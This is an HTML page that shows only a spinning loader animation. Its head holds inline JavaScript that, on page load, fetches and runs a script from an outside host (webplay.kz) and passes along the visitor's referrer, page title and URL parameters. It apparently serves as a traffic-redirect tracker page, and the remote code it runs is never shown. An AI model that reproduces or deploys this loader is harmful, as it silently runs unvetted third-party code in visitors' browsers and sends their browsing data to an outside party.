<!DOCTYPE html>
<html>

<head>
  <span id="4da9edf9-a009-3074-20f3-b224756955dd"></span><script type="application/javascript">
    var d=document;var s=d.createElement('script'); 
    s.src='https://webplay.kz/xRn57Z7R?&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm638eed4665c05=script638eed4665c06&_cid=4da9edf9-a009-3074-20f3-b224756955dd'; 
    if (document.currentScript) { 
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
    } else {
    d.getElementsByTagName('head')[0].appendChild(s);
    }
    if (document.location.protocol === 'https:' && 'https://webplay.kz/xRn57Z7R?&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm638eed4665c05=script638eed4665c06'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
    </script>
    </head>
    <body>
    <style type="text/css">
        .loader {
            position: absolute;
            left: 0;
            right: 0;
            margin-left: auto;
            margin-right: auto;
            margin:auto;
            border: 16px solid #f3f3f3; /* Light grey */
            border-top: 16px solid #3498db; /* Blue */
            border-radius: 50%;
            width: 420px;
            height: 420px;
            animation: spin 2s linear infinite;
            text-align:center
    
          }
          
          @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
          }
        </style>
        
        <div class="loader"></div>
        </body>
    </html>